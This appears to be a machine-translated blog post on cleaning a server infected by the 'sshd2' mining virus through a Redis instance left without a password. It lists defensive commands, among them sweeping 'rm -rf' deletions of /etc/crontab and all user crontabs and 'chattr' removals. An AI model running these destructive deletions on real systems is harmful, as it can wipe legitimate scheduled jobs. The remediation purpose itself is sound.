Solve the mining virus sshd2 (redis does not set a password and clear the crontab scheduled task)

Use in Tianyi cloud redis, Open the 6379 port , But I was not right at that time redis Set the password 、 Lead to the invasion of mining virus , Pictured ：

This virus , Execution principle , Please refer to the article ：

https://www.freebuf.com/column/211777.html

Virus script reference ：

https://www.cnblogs.com/mikeguan/p/11314005.html

solve ：

One 、 This virus starts after , Will occupy the host cpu to 99%.

1. Query virus path ,lsof -p pid：

2. Clear virus threads

kill -9 pid

3. Remove virus programs

rm -rf /tmp/javax/*

Two 、 Because after clearing , It can be pulled up by scheduled tasks , More stubborn , While clearing the process , To clear away Timing task ,

Detailed as follows ：

1. If not used linux Timing task ,crontab, Can be removed

• rm -rf /etc/cron.d/root

• rm -rf /var/spool/cron/crontabs

• rm -rf /etc/crontab

• Turn off auto start ：

  systemctl disable crond.service

   

2. If you use , For clearing

• rm -rf /var/spool/cron/crontabs/root

• rm -rf /var/spool/cron/root

notes ： Encounter something that cannot be deleted , perform :

• chattr -i /var/spool/cron/root
• chattr -a /var/spool/cron/root

cat -n /var/log/cron | tail -10

4. After clearing successfully

• Please redis Set the password ,
• Configure remote port security groups
• modify redis bind ip（ Suggest ）